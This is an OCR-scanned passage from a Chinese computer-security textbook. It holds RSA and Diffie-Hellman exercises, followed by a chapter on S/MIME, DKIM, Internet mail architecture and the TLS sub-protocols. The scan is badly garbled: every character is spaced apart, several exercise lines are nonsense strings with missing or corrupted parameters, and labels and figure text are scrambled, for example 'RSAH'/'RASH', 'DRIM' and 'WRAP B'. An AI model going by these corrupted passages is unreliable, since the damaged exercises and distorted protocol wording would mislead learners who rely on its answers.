给 定 一 个 分 组 C1， 选 择 C2 使 得 RSAH(C1, C2)=RASH(B1, B2) 
图 21-9 表示 了 一 个 HMAC 的 一 种 选择 性 
实现 方案 。 Bi 
a. 描述 该 实现 方案 的 操作 。 
b. 该 实现 方案 比 图 214 所 示 的 有 什么 
优势 ? 
用 图 21-9 所 示 的 RSA 算法 对 下 列 数据 实 
现 加 密 和 解密 : 
a. p=3; q=11, e=7; M=5 
b. p=5; q=11, e=3; M=9 
c. p=7; q=11, e=17; M=8 
d. p=11; q=13, e=11; M=7 
e. p=17; q=31, e=7; M=2 
在 使 用 RSA 的 公 钥 体制 中 ， 已 截获 发 给 某 
用 户 的 密 文 C=10， 该 用 户 的 公 钥 e=5, 
1 一 35， 那 么 明文 M 等 于 多 少 ? 
在 RSA 体制 中 ， 某 给 定 用 户 的 公 钥 e= 
31, n 二 3599， 那 么 该 用 户 的 私 钥 等 于 
多 少 ? 
假定 我 们 已 知 若 干 用 RSA 算法 编码 的 分 组 B21) HMAC HIS 
但 不 知 私 钥 ， 假 设 n=pq, e 是 公 钥 。 若 某 人 告诉 我 们 说 他 知道 其 中 有 一 个 明文 分 组 与 六 有 公 因 
子 ， 这 对 我 们 有 帮助 吗 ? 


对 每 条 消息 加 密 
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21.10 考虑 下 列 方法 : 


1. 挑选 一 个 奇数 E. 

2. PETRA PAO, HH (一 D(C2 一 D) 一 1 是 互 的 偶数 倍 。 
3. 己 和 O 相 乘 得 到 N, 

4 计算 = COMETE : 

这 个 方法 与 RSA 等 价 吗 ? 解释 之 。 
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21.11 假设 Bob 使 用 模 很 大 的 RSA 加 密 系统 。 该 模 值 在 合理 的 时 间 内 不 能 进行 因 式 分 解 。 假 设 Alice 
给 Bob 发 送 一 条 把 每 个 字母 对 应 成 0 ~ 25 之 间 整 数 (4 一 0, …, Z 一 25) 的 消息 ， 然 后 使 用 具 


有 大 的 e、n 值 的 RSA 分 别 加 密 每 个 数 。 这 种 方法 安全 吗 ? 如 果 不 安全 ， 给 出 对 这 种 加 密 方案 最 
有 效 的 攻击 。 


21.12 ”考虑 公共 素数 g=11 和 本 原 根 a=2 的 Diffie-Hellman 方案 。 
a. 如 果 用 户 A 有 公 钥 n=, W A 的 私 钥 X 是 什么 ? 
b. WRAP B 有 公 钥 ==3， 请 问 共享 的 密 钥 KX 是 什么 ? 
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Internet 安全 协议 和 标准 


学 习 目 标 

学 习 完 本 章 之 后 ， 你 应 该 能 够 : 

e 概述 MIME; 

© 理解 S/MIME 的 功能 及 其 面临 的 安全 威胁 ; 


解释 SSL 的 关键 组 件 ; 

讨论 HTTPS 的 应 用 ; 

概述 IPSec; 

讨论 封装 安全 载荷 的 格式 和 功能 。 





本 章 主要 介绍 一 些 广泛 使 用 的 重要 Internet 安全 协议 和 标准 。 


22.1 ”安全 E-mail 和 S/MIME 


安全 /多 用 途 网 际 邮件 扩展 ( Secure/Multipurpose Internet Mail Extension，S/MIME) 是 对 
Internet 电子 邮件 ( Internet E-mail) 格式 标准 MIME 的 安全 性 的 增强 ， 其 安全 性 是 基于 RSA 数 
据 安 全 性 的 。 


22.1.1 MIME 


多 用 途 网 际 邮件 扩展 (MIME) 是 对 Intemet 电子 邮件 格式 的 旧 的 RFC 822 规范 的 扩展 。 
RFC 822 定义 了 一 个 简单 报头 ， 包 括 到 哪里 (To)、 来 自 哪 里 ( From)、 主 题 (Subject) 以 及 一 
些 其 他 的 域 ， 这 些 能 够 用 于 通过 Internet 发 送 E-mail 消息 ， 同 时 也 提供 了 E-mail 内 容 的 基本 信 
息 。RFC 822 中 规定 内 容 采用 简单 的 ASCII 文本 格式 。 

MIME 提供 一 些 新 的 报头 域 ， 这 些 域 定义 了 消息 正文 或 称 主体 ) (body of the message) 有 
关 的 信息 ， 包 括 正文 的 格式 和 便于 转化 的 任何 编码 形式 。 最 重要 的 是 ，MIME 定义 了 一 些 内 容 
格式 ， 用 于 支持 多 媒体 E-mail 进行 标准 化 表示 ， 比 如 包括 文本 、 图 像 、 音 频 、 视 频 等 。 


22.1.2 S/MIME 


S/MIME 是 作为 一 个 附加 的 MIME 的 内 容 类 型 ( 见 表 22-1) 的 集合 而 定义 的 ， 其 提供 了 签 
名 或 加 密 E-mail 消息 的 能 力 。 本 质 上 ， 这 些 内 容 类 型 支持 4 种 新 的 功能 : 
o 封装 数据 (enveloped data): 它 由 各 种 类 型 的 加 密 内 容 和 接收 方 用 于 加 密 内 容 的 一 个 或 


多 个 密 钥 组 成 。 
o 签名 数据 (signed data): 数字 签名 通过 提取 要 签名 内 容 的 消息 摘要 ， 并 用 签名 者 的 私 钥 
Fš 加 密 得 到 。 然 后 ， 用 base64 编码 方法 重新 对 内 容 和 签名 编码 。 因 此 ， 一 个 经 过 签名 的 
694 数据 消息 只 能 被 具有 S/MIME 功能 的 接收 方 处 理 。 


© 透明 签名 数据 〈 clear-signed data): 和 签名 的 数据 一 样 ， 其 形成 了 内 容 的 数字 签名 。 但 
在 这 种 情况 下 ， 只 有 数字 签名 采用 了 base64 编码 。 因 此 ， 没 有 S/MIME 功能 的 接收 方 
虽然 无 法 验证 签名 ， 但 却 可 以 看 到 消息 内 容 。 
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© 签名 并 封装 数据 (signed and enveloped data): EZ MAA LINBRAB A WEN, 
以 使 对 加 密 后 的 数据 可 以 签名 ， 对 签名 数据 和 透明 签名 数据 可 以 进行 加 密 。 


表 22-1 S/MIME 内 容 类 型 


Application 签名 的 S/MIME 实体 
a Sab S 
multipart/signed 消息 中 签名 子 部 分 的 内 容 类 型 


图 22-1 给 出 了 使 用 S/MIME 的 一 个 典型 的 例子 。 
Bob 的 私 钥 ”一 次 性 会 话 密 钥 Alice A494 


foo NS 
` 


This is an S/MIME 
message from Bob message from Bob 
to Alice. Bob will to Alice. Bob will 
sign and encrypt |» | sign and encrypt 
the message before 
sending it to Alice. 


This is an S/MIME 
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明文 报 文 附加 数字 签名 用 一 次 性 会 话 密 钥 附加 会 话 密 钥 的 文档 转化 为 
(未 签名 ) (DSS/SHA ) 加 密 的 签名 报 文 加 密 副本 Radix-64 格 式 
(3DES) (El Gamal ) 


图 22-1 典型 的 S/MIME 创建 过 程 及 S/MIME 消息 


签名 和 透明 签名 数据 “用 于 对 S/MIME 消息 进行 签名 的 默认 算法 是 数字 签名 标准 (Digital 
Signature Standard, DSS) 和 安全 散 列 算法 修订 版 1 (SHA-1)。 工 作 过 程 如 下 : 首先 ， 用 
SHA-1 把 要 发 送 的 消息 映射 成 160 位 固定 长 度 的 编码 。 对 于 所 有 的 实际 应 用 ， 这 160 位 的 消 
息 摘 要 对 这 个 消息 是 唯一 的 。 有 人 要 更 改 消 息 或 用 另 一 个 消息 来 代替 ， 并 仍然 具有 相同 的 摘 
要 ， 这 几乎 是 不 可 能 的 。 然 后 ，S/MIME 利用 发 送 方 的 DSS 私 钥 用 DSS 加 密 这 个 摘要 。 这 样 
就 得 到 了 数字 签名 ,将 其 附加 到 消息 上 。 现 在 ,无论 是 谁 得 到 了 该 消息 都 可 以 重新 计算 消息 摘 
要 ， 然 后 用 DSS 和 发 送 方 的 DSS 公 钥 解密 签名 。 如 果 消 息 中 的 消息 摘要 和 计算 出 的 消息 摘要 
匹配 ， 那 么 数字 签名 就 是 有 效 的 。 由 于 这 种 操作 仅 包 括 加 密 和 解密 一 个 160 位 的 组 ， 因 此 只 花 
费 很 少 的 时 间 。 

作为 替代 方案 ，RSA 公 钥 加 密 算法 可 以 和 SHA-1 或 MD5 消息 摘要 算法 一 起 使 用 ， 用 于 
生成 签名 。 

签名 是 一 个 二 进 制 的 字符 串 ， 通 过 Internet 电子 邮件 发 送 它 可 能 会 导致 莫名 的 内 容 的 改 
变 ， 因 为 一 些 电 子 邮件 软件 将 会 试图 通过 寻找 像 换 行 这 样 的 控制 字符 来 解释 消息 的 内 容 。 
为 了 保护 数据 ， 签 名 或 附加 消息 的 签名 被 radix-64 或 base64 映射 规则 映射 为 ASCII 字符 。 
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radix-64 把 输入 的 每 三 个 八 位 组 的 二 进 制 数据 映射 为 4 个 ASCII 字符 ( 见 附 录 G)。 > 

封装 数据 ”用 于 加 密 S/MIME 消息 的 默认 算法 是 3DES 和 ElGamal 公 钥 加 密 方案 ， 它 是 基 
F Diffie-Hellman 的 公 钥 交换 算法 的 。 开 始 ，S/MIME 产生 一 个 伪 随 机 密 钥 ， 这 个 密 钥 用 于 使 
用 3DES 或 者 一 些 常规 加 密 方案 对 消息 进行 加 密 。 在 任何 常规 加 密 应 用 中 ， 密 钥 分 发 问题 必须 
解决 。 在 S/MIME 中 ， 每 个 常规 密 钥 只 能 使 用 一 次 。 也 就 是 说 ， 对 每 个 新 消息 加 密 都 需要 产生 
一 个 新 的 伪 随 机 密 钥 。 这 个 会 话 密 钥 被 绑 定 在 消息 中 并 和 它 一 起 传输 。 该 密 钥 被 用 来 作为 公 
钥 加 密 算法 ElGamal 的 输入 ， 使 用 接收 方 的 ElGamal 公 钥 对 该 密 钥 进行 加 密 。 在 接收 方 端 ，S/ 
MIME 使 用 接收 方 的 ElGamal 私 钥 ， 恢 复 密 钥 并 且 使 用 这 个 密 钥 和 3DES 算法 恢复 消息 明文 。 

如 果 仅 用 于 加 密 ，radix-64 是 用 来 把 密 文 转 化 为 ASCII 格式 的 。 

公 角 证书” 就 如 上 面 所 讨论 的 ，S/MIME 含有 一 个 精巧 、 高 效 和 连锁 的 功能 集合 和 格式 来 
提供 有 效 的 加 密 和 签名 服务 。 为 了 完善 该 系统 ， 最 后 需要 引起 注意 的 问题 是 公 钥 管理 问题 。 

允许 S/MIME 大 规模 使 用 的 基本 工具 是 公 钥 证 书 。S/MIME 使 用 的 证 书 遵从 Internet 标准 
X.S09v3 。 


22.2 ”域名 密 钥 识别 邮件 标准 


域名 密 钥 识别 邮件 标准 ( DomainKeys Identified Mail, DKIM) 是 一 种 电子 邮件 消息 加 密 
签名 的 规范 ， 它 允许 一 个 签名 的 域名 来 声明 其 对 邮件 流 中 的 某 个 消息 负责 。 邮 件 接收 者 (或 
者 代表 他 们 的 代理 人 ) 可 以 通过 查询 签名 者 的 域名 来 直接 得 到 对 应 的 公 钥 来 验证 签名 ， 进 
而 确认 消息 是 来 自 于 拥有 签名 域名 私 钥 的 一 方 。DKIM 是 一 个 Internet 建议 标准 (RFC 4871: 
DomainKeys Identified Mail (DKIM) Signatures), DKIM 已 被 一 系列 的 电子 邮件 提供 商 广泛 采用 ， 
包括 很 多 企业 、 政 府 机 构 、gmail、yahoo 和 许多 Internet 服务 提供 商 (Internet Service Provider, 
ISP) 等 。 


22.2.1 Internet 邮件 体系 结构 


为 了 理解 DKIM 的 运行 ， 对 Internet 邮件 体系 结构 ( Internet mail architecture) 有 一 个 基本 
的 了 解 将 会 是 十 分 有 帮助 的 。Internet 邮件 体系 结构 目前 是 在 RFC 5598 中 定义 的 。 本 小 节 将 对 
这 些 基 本 概念 进行 简要 介绍 。 
在 最 基本 的 层面 上 ，Internet 邮件 体系 结构 由 一 个 表现 为 邮件 用 户 代理 (Message User 
Agent, MUA) 形式 的 用 户 区 和 表现 为 消息 处 理 服 务 (Message Handling Service, MHS) 形式 
的 传输 区 组 成 ，MHS 由 邮件 传输 代理 ( Message Transfer Agent, MTA) 构成 。MHS 从 一 个 用 
户 那里 接收 消息 并 把 它 交付 给 一 个 或 多 个 其 他 用 户 ， 从 而 创建 一 个 虚拟 的 MUA-to-MUA 交换 
环境 。 该 体系 结构 包括 三 种 类 型 的 交互 。 直 接 在 用 户 之 间 的 交互 : 消息 必须 由 MUA 代表 信息 
发 送 方 进行 格式 化 ， 使 得 消息 可 以 由 目的 MUA 展示 给 邮件 收 件 人 。 在 MUA 和 MHS 之 间 也 
有 互 操作 性 需求 : 首先 一 个 消息 从 MUA 发 送 到 MHS ， 然 后 再 从 MHS 交付 给 目标 MUA. A 
Sb, WA MHS 传输 路 径 的 MTA 组 件 之 间 的 互 操作 性 也 是 需要 的 。 
图 22-2 给 出 了 Internet 邮件 体系 结构 的 关键 组 成 部 分 ， 包括 : 
o 邮件 用 户 代 理 (Message User Agent, MUA): 代表 用 户 和 用 户 应 用 程序 工作 ， 在 邮件 
服务 中 是 用 户 的 代理 人 。 通 常 ， 该 组 件 在 用 户 的 计算 机 中 被 称 为 电子 邮件 客户 端 程序 
或 者 本 地 网 络 电子 邮件 服务 器 。 邮 件 作 者 MUA 将 消息 格式 化 ， 并 通过 MSA 初始 提交 
A| MHS, KFA MUA 处 理 接收 到 的 邮件 ， 进 行 存储 或 展示 给 收 件 人 。 

e 邮件 提交 代理 (Mail Submission Agent, MSA): 接收 MUA 提交 的 消息 ， 执 行 宿主 域名 
的 策略 和 Internet 标准 的 要 求 。 该 组 件 可 以 位 于 与 MUA 一 起 的 地 方 ， 也 可 以 作为 一 个 
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单独 的 功能 模型 。 在 后 者 的 情形 下 , MUA 和 MSA 之 间 使 用 简单 邮件 传输 协议 (Simple 
Mail Transfer Protocol, SMTP). 

© 邮件 传输 代理 ( Message Transfer Agent, MTA): 以 应 用 层 的 一 跳 的 形式 传送 邮件 ， 就 
像 一 个 数据 包 在 交换 机 或 者 IP 路 由 器 中 进行 路 由 选择 一 样 ， 将 消息 向 离 接收 者 更 近 的 
方向 传送 。 传 送 是 在 一 系列 MTA 之 间 进 行 的 ， 直 到 消息 到 达 目 的 MDA。MTA 也 会 在 
消息 头 部 添加 跟踪 信息 。 在 MTA Al MTA 之 间 ，MTA 和 MSA 或 者 MDA 之 间 ， 使 用 
SMTP 协议 。 

© 邮件 投递 代理 (Mail Delivery Agent, MDA): 负责 将 消息 从 MHS 传送 到 MS. 

© 邮件 存储 器 (Message Store, MS): 一 个 MUA 可 以 使 用 长 期 工作 的 MS。MS 可 以 位 于 
远程 的 服务 器 上 ， 或 者 和 MUA 在 相同 的 机 器 上 。 通 常 ，MUA 从 远程 服务 器 上 取 回 消息 
使 用 的 是 POP (Post Office Protocol) 或 者 IMAP (Internet Message Access Protocol) 协议 。 





图 22-2 功能 组 件 及 它们 之 间 使 用 的 标准 化 协议 


另外 ， 还 有 两 个 概念 需要 被 定义 。 一 个 是 行政 管理 域 (Administrative Management 
Domain，ADMD)， 它 是 一 个 Internet 邮件 提供 者 。 这 样 的 例子 包括 一 个 运营 本 地 邮件 中 继 
(MTA) 的 部 门 ， 一 个 运营 企业 邮件 中 继 的 IT 部 门 ， 以 及 运营 公共 共享 电子 邮件 服务 的 ISP 
(Internet 服务 提供 商 )。 每 一 个 ADMD 都 可 以 有 不 同 的 运营 策略 和 基于 信任 的 决策 。 一 个 明显 
的 例子 是 ， 在 一 个 组 织 内 部 交换 的 邮件 与 独立 组 织 之 间 交 换 的 邮件 存在 的 区 别 。 用 于 处 理 这 两 
种 类 型 的 业务 的 规则 往往 是 完全 不 同 的 。 

另 一 个 概念 是 域名 系统 。 域 名 系统 ( Domain Name System, DNS) 是 一 种 目录 查询 服务 ， 
其 提供 了 Internet 上 主机 域名 和 其 数字 地 址 之 间 的 映射 。 


22.2.2 DKIM 策略 


DKIM 是 为 提供 一 个 对 终端 用 户 透 明 的 电子 邮件 认证 技术 而 设计 的 。 本 质 上 ， 使 用 电子 邮 
件 所 来 自 的 管理 域 的 私 钥 ， 对 用 户 的 电子 邮件 消息 进行 签名 。 该 签名 涵盖 了 所 有 的 消息 内 容 和 
一 些 RFC 5322 消息 头 。 在 接收 端 ，MDA 可 通过 DNS 得 到 相应 的 公 钥 并 验证 签名 ， 从 而 验证 
该 消息 来 自 于 其 所 声明 的 管理 域 。 因 此 ， 来 自 别 的 地 方 但 声称 来 自 于 给 定 域 的 邮件 ， 将 无 法 通 
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过 认证 测试 ， 并 会 被 拒绝 。 该 方法 不 同 于 S/MIME, S/MIME 使 用 发 送 者 的 私 钥 对 消息 内 容 进 
行 签 名 。DKIM 的 动机 是 基于 以 下 推理 : 

1. S/MIME 依赖 于 发 送 和 接收 的 用 户 都 使 用 S/MIME。 对 于 几乎 所 有 的 用 户 来 说 ， 大 部 分 
接收 到 的 邮件 都 不 使 用 SMMIME， 而 且 用 户 想 要 发 送 给 接收 人 的 大 部 分 邮件 也 不 使 用 S/MIME。 

2. S/MIME 仅仅 签名 消息 内 容 。 因 此 ， 涉 及 邮件 来 源 的 RFC 5322 消息 头 信息 可 能 会 受到 
破坏 。 

3. DKIM 并 不 在 客户 端 程序 (MUA) 中 实现 ， 因 此 对 用 户 透 明 ; 用 户 无 须 做 任何 操作 。 

4. DKIM 会 应 用 到 来 自 于 具有 协作 关系 的 域 的 所 有 的 邮件 。 

5. DKIM 使 得 真实 发 件 人 可 以 证 明 他 们 确实 发 送 过 特定 消息 ， 并 防止 伪造 者 伪装 成 真实 发 
件 人 。 

图 22-3 给 出 了 DRIM 运行 的 一 个 简单 的 例子 。 首 先 ， 由 用 户 生 成 一 个 消息 ， 传 输 到 
MHS ， 接 着 传输 给 用 户 所 在 的 管理 域 之 内 的 MSA。 电 子 邮件 消息 由 一 个 电子 邮件 客户 端 程序 
生成 。 消 息 内 容 加 上 所 选 RFC 5322 消息 头 ， 被 电子 邮件 提供 者 使 用 提供 者 的 私 钥 进行 签名 。 
签名 者 与 域 相关 ， 这 可 能 是 一 个 企业 局 域 网 、 一 个 ISP 或 者 公共 电子 邮件 设施 (如 gmail)。 然 
后 ， 签 名 后 的 消息 通过 Intemet 经 过 一 系列 的 MTA 进行 传输 。 在 目的 地 ，MDA 取 回 传人 的 签 
名 所 对 应 的 公 钥 ， 并 在 将 邮件 传递 到 目标 电子 邮件 客户 端 之 前 验证 签名 。 默 认 的 签名 算法 是 带 
有 SHA-256 的 RSA 算法 。 也 可 以 使 用 带 有 SHA-1 的 RSA 算法 。 


SMTP 








邮件 发 起 网 络 : 邮件 交付 网 络 
DNS: 域名 系统 


MUA: 邮件 用 户 代理 
Al 22-3 DKM 部 署 的 简单 示例 


22.3 “安全套 接 层 和 传输 层 安 全 


应 用 最 广泛 的 一 个 安全 服务 就 是 安全 套 接 层 (Secure Socket Layer, SSL) 和 随后 出 现 的 
Internet 标准 传输 层 安 全 (Transport Layer Security, TLS), ŽE RFC 4346 中 定义 的 。TLS 
已 经 在 很 大 程度 上 取代 了 早期 的 SSL 实现 。TLS 是 以 一 组 协议 的 方式 实现 的 一 个 通用 服务 ， 
其 中 的 协议 依赖 于 TCP。 在 这 个 层面 上 ， 有 两 种 实现 方案 可 供 选 择 。 为 保证 充分 的 通用 性 ， 
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TLS 可 以 作为 基础 协议 组 的 一 部 分 ， 因 此 对 应 用 来 说 是 透明 的 。 作 为 选择 ，TLS tay WATE 
特定 的 软件 包 中 。 例 如 ， 大 多 数 浏览 器 都 配备 了 SSL 协议 ， 并 且 多 数 Web 服务 器 也 实现 了 这 
个 协议 。 

22.3.1 TLS 体系 结构 


TLS 被 设计 成 使 用 TCP 来 提供 可 靠 的 端 
到 端的 安全 服务 。TLS 不 是 简单 的 单个 协议 ， 
而 是 两 层 协 议 ， 如 图 22-4 所 示 。 
记录 协议 (Record Protocol) 为 多 种 高 层 
协议 提供 基本 的 安全 服务 。 特 别 地 ， 超 文本 
传输 协议 (Hypertext Transfer Protocol, HTTP) 
是 为 Web 客户 端 /服务 器 交互 提供 传输 服务 
的 ， 它 可 以 在 TLS 的 顶层 运行 。 三 个 较 高 层 
次 的 协议 被 定义 为 SSL 的 一 部 分 ， 它们 是 握 eee: ASL 
手 协议 ( Handshake Protocol)、 修 改 密码 参数 协议 ( Change Cipher Spec Protocol) 及 报警 协议 
(Alert Protocol), X4 TLS 特有 的 协议 ， 用 于 TLS 交换 的 管理 。 后 面 将 分 析 这 些 内 容 。 
TLS 协议 中 的 两 个 重要 概念 是 TLS 会 话 和 TLS 连接， 它们 在 规范 中 的 定义 如 下 : 
e 连接 (connection): 连接 是 一 种 能 够 提供 合适 服务 类 型 的 传输 (依据 OSI 层次 模型 中 的 
定义 )。 对 TLS 来 说 ， 这 样 的 连接 是 点 到 点 的 连接 关系 ， 而 且 这 些 连接 是 瞬 态 的 、 暂 
时 的 。 每 一 个 连接 都 与 一 个 会 话 关 联 。 
© id (session): TLS 会 话 是 一 个 客户 端 和 一 个 服务 器 之 间 的 一 种 关联 。 会 话 由 握手 协 
议 ( Handshake Protocol) 创建 。 所 有 会 话 都 定义 了 一 组 密码 安全 参数 ， 这 些 安全 参数 
可 以 在 多 个 连接 之 间 共 享 。 会 话 可 以 用 来 避免 每 个 连接 需要 进行 的 、 代 价 高 昂 的 新 的 
安全 参数 的 协商 过 程 。 
在 任何 一 对 实体 之 间 ( 例 如， 客户 端 和 服务 器 上 HTTP 应 用 )， 可 以 有 多 个 安全 连接 。 理 
论 上 讲 ， 也 允许 一 对 实体 之 间 同 时 有 多 个 会 话 存在 ， 但 这 个 特性 在 实际 中 并 没有 使 用 。 


22.3.2 TLS 协议 


记录 协议 ”SSL 记录 协议 为 SSL 连接 提供 了 两 种 服务 : 
© 机 密 性 (confidentiality): 握手 协议 定义 了 一 个 共享 密 钥 ， 用 于 对 SSL 载荷 对 称 加 密 。 
© 消息 完整 性 ( message integrity): 握手 协议 还 定义 了 一 个 共享 密 钥 ， 它 用 来 产生 一 个 
消息 认证 码 (Message Authentication 
Code, MAC). 
图 22-5 给 出 了 SSL 记录 协议 的 全 部 操 
作 流 程 。 第 一 步 是 分 段 ( fragmentation )。 首 
先 将 每 个 上 层 消息 分 解 成 不 大 于 2"* 字 节 
(16 384 字 节 ) 的 组 ， 然 后 有 选择 地 进行 压 
缩 (compression)。 处 理 过 程 的 第 二 步 是 在 
压缩 数据 的 基础 上 计算 消息 认证 码 (message 
authentication code)。 然 后 把 压缩 消息 加 上 
MAC 用 对 称 加 密 方法 进行 加 密 (encrypt). 
SSL 记录 协议 的 最 后 一 步 处 理 是 添加 图 22-5 TLS 记录 协议 操作 
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(prepend) 一 个 头 部 ， 其 中 包含 版 本 和 长 度 域 。 

定义 的 内 容 类 型 包括 修改 密码 参数 协议 、 报 警 协 议 、 握 手 协议 及 应 用 数据 4 种 。 前 3 个 是 
针对 TLS 的 协议 ,后面 将 讨论 这 几 个 协议 。 值 得 注意 的 是 ， 可 能 使 用 TLS 的 各 种 应 用 之 间 不 
存在 区 别 ， 由 这 些 应 用 所 产生 的 数据 的 内 容 对 于 TLS 来 说 是 不 透明 的 。 

然后 ， 记 录 协 议 在 一 个 TCP 段 中 传输 作为 结果 的 单元 。 将 收 到 的 数据 进行 解密 、 验 证 、 
解压 ， 并 重新 组 装 (reassembled)， 再 交付 给 更 高 级 别 的 用 户 。 

变更 密码 规范 协议 ”变更 密码 规范 协议 是 TLS 记录 协议 中 的 4 个 TLS 规范 协议 之 一 ， 该 
协议 也 是 最 简单 的 。 这 个 协议 只 包含 一 条 消息 ， 由 一 个 值 为 1 的 字 节 组 成 。 这 个 消息 的 唯一 功 
能 就 是 将 预备 状态 (pending state) 拷贝 到 当前 状态 ， 该 消息 更 新 了 在 这 一 连接 中 使 用 的 密码 
套件 。 

报警 协议 ”报警 协议 用 于 将 与 TLS 相关 的 报警 传达 给 对 等 实体 。 与 使 用 TLS 的 其 他 应 用 
一 样 ， 报 警 消息 需要 依据 当前 状态 的 规范 进行 压缩 和 加 密 。 

这 个 协议 中 的 每 个 消息 由 两 个 字 节 组 成 。 其 中 的 第 一 个 字 节 通过 值 1 表示 警告 ， 值 2 表示 
致命 错误 ， 来 表达 消息 出 错 的 严重 程度 。 如 果 级 别 为 致命 , TLS 立即 中 断 当 前 连接 。 而 会 话 中 
其 他 连接 继续 进行 ， 但 不 会 在 此 会 话 中 建立 新 连接 。 第 二 个 字 节 包含 了 一 个 描述 特定 警报 信息 
的 编码 。 例 如 ， 严 重 程度 为 致命 的 警报 的 一 个 例子 是 ， 一 个 不 正确 的 MAC ; 严重 程度 为 非 臻 
命 的 警报 的 一 个 例子 是 ， 一 个 close_notify 消息 ， 它 通知 收 件 人 本 次 连接 中 发 送 方 将 不 再 发 送 
任何 其 他 的 消息 。 

握手 协议 TLS 最 复杂 的 部 分 就 是 握手 协议 。 这 个 协议 允许 服务 器 和 客户 端 互相 认证 ， 并 
协商 加 密 和 MAC 算法 ， 以 及 用 于 保护 TLS 记录 中 所 发 送 数据 的 加 密 密 钥 。 担 手 协 议 在 任何 应 
用 数据 被 传输 之 前 使 用 。 

握手 协议 由 一 系列 客户 端 和 服务 器 客户 端 服务 器 
之 间 交 换 的 消息 组 成 。 图 22-6 阐释 了 在 
客户 端 和 服务 器 之 间 建 立 一 个 逻辑 连接 所 
需要 的 最 初 的 交换 过 程 。 这 种 消息 交换 有 
4 个 阶段 。 

第 一 阶段 用 来 初始 化 一 个 逻辑 连接 
并 建立 与 之 相关 的 安全 能 力 。 交 换 由 客户 
端 发 起 ， 客 户 端 将 发 送 client-hello 消息 ， 


















第 一 阶段 : 建立 安全 能 
力 ， 包 括 协议 版 本 、 会 话 
ID、 密 码 构件 、 压 缩 方法 
和 初始 随机 数 


i 第 二 阶段 : 服务 器 发 送 
SS) 证 书 、 密 钥 交 换 数据 和 证 
书 请 求 ， 最 后 发 送 hello 
消息 阶段 的 结束 信号 





该 消息 带 有 如 下 参数 : e Š 
。 版 本 (version): 客户 端 所 支持 的 E 
最 高 TLS 版 本 。 之 后 客户 端 发 送 密 钥 交换 


e 随机 数 (random): 一 个 客户 端 生 
成 的 随机 结构 ， 由 一 个 32 位 的 时 $ 
间 惟 和 一 个 由 安全 随机 数 生成 器 Sem 


数据 ， 也 可 以 发 送 证 书 验证 
消息 


生成 的 28 位 随机 数组 成 。 这 些 值 第 四 阶段 : 变更 密码 构 
在 密 钥 交换 时 用 来 防止 重 放 攻击 。 |_ wz 件 ， 结 束 握手 协议 
© 会 话 标识 (session ID): 一 个 可 变 ER 


长 的 会 话 标 识 符 。 标 识 符 为 非 0 Ei ee 
值 ， 表 示 客 户 端 希望 更 新 一 个 已 的 或 者 依赖 于 消息 的 状态 ， 
经 存在 的 连接 的 参数 或 者 在 这 次 并 不 要 求 必须 传递 


会 话 中 建立 一 个 新 的 连接 ; 0 值 图 22-6 ”握手 协议 过 程 
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则 表示 客户 端 希 望 在 新 的 会 话 中 建立 一 条 新 的 连接 。 
e 密码 构件 (cipher suite): 这 是 一 个 由 客户 端 支持 的 加 密 算法 组 合 的 列表 ， 按 照 优 先 选 
用 的 递减 次 序 排列 。 列 表 中 的 每 一 行 ( 即 每 一 个 密码 构件 ) 定义 了 一 个 密 钥 交换 算法 和 
密码 规范 (CipherSpec)。 
© 压缩 方法 (compression method); 这 是 一 个 客户 端 支持 的 压缩 方法 的 列表 。 
当 客 户 端 发 出 client-hello 消息 后 ， 客 户 端 等 待 服务 器 的 server-hello 消息 ， 该 消息 包含 了 
与 客户 端 client-hello 消息 中 同样 的 参数 。 
第 二 阶段 的 细节 依赖 于 所 使 用 的 公 钥 加 密 方案 。 在 一 些 情况 下 ， 服 务 器 发 送 给 客户 端 一 个 
证 书 (可 能 附加 了 密 钥 信 息 )， 并 请 求 来 自 客户 端的 证 书 。 
在 第 二 阶段 最 后 的 消息 是 一 个 经 常 被 请 求 的 消息 ， 它 是 server_done 消息 ， 由 服务 器 发 送 
并 示意 服务 器 hello 消息 及 其 他 相关 消息 结束 。 当 发 送 完 这 个 消息 后 ， 服 务 器 将 等 待 客户 端的 
反应 。 
第 三 阶段 中 收 到 server_done 消息 后 ， 如 果 有 需要 ， 客 户 端 应 该 验证 服务 器 提供 的 证 书 的 
有 效 性 ， 并 且 同 时 检查 sever-hello 参数 是 否 是 可 接受 的 。 如 果 所 有 条 件 都 满足 ， 客 户 端 会 给 服 
务 器 返回 一 个 或 多 个 消息 ， 这 依赖 于 所 使 用 的 公 钥 密 码 方案 。 
第 四 阶段 建立 安全 连接 完成 。 客 户 端 发 送 一 个 变更 密码 规范 (change cipher spec) 的 消 
息 ， 并 把 一 个 未 定 的 密码 规范 复制 到 现在 的 密码 规范 中 。 值 得 注意 的 是 ， 这 个 消息 不 能 认为 是 
握手 协议 的 一 部 分 ， 而 是 用 变更 密码 规范 协议 发 送 。 客 户 端 在 新 算法 、 密 钥 和 密码 下 立即 发 送 
结束 (finish) 消息 ， 结 束 消 息 用 于 核实 密 钥 交 换 和 认证 过 程 是 成 功 的 。 
作为 对 客户 端 发 送 的 这 两 条 消息 的 回应 ， 服 务 器 发 送 它 自 己 的 改变 密码 规范 消息 
( change_cipher_spec_massage)， 把 未 定 的 密码 规范 转移 到 现在 的 密码 规范 中 ， 并 发 送 它 的 结束 
消息 。 到 此 为 止 握手 过 程 结 束 ， 客 户 端 和 服务 器 可 以 开始 交换 应 用 层 的 数据 了 。 
心跳 协议 (Heartbeat Protocol) 由 计算 机 网 络 的 相关 知识 我 们 知道 ， 心 跳 (heartbeat) 是 由 
硬件 或 软件 产生 的 一 个 周期 性 的 信号 ， 用 以 表明 操作 正常 ， 或 用 以 与 一 个 系统 的 其 他 部 分 进行 
同步 。 心 跳 协 议 通常 用 于 监测 一 个 协议 实体 的 可 用 性 。 在 SSL/TLS 的 特定 情形 下 ， 心 跳 协 议 
(Heartbeat Protocol) 于 2012 年 定义 在 RFC 6250 (传输 层 安全 协议 (TLS) 与 数据 报 传输 层 安全 
性 协议 (DTLS) 心跳 扩展 ) 中 。 
心跳 协议 运行 在 TLS 记录 协议 的 顶部 ， 包 括 两 种 消息 类 型 : 心跳 请 求 (heartbeat_request) 
和 心跳 响应 (heartbeat response) 。 心 跳 协 议 的 使 用 是 在 握手 协议 的 第 一 阶段 ( 见 图 22-6 ) 
中 确立 的 。 每 一 个 对 等 端 都 要 表明 其 是 否 支持 心跳 。 如 果 支 持 ， 则 要 指出 它 是 否 愿意 接收 
heartbeat request 消息 并 以 heartbeat_response 消息 响应 ， 还 是 仅仅 愿意 发 送 heartbeat_ request 
消息 。 
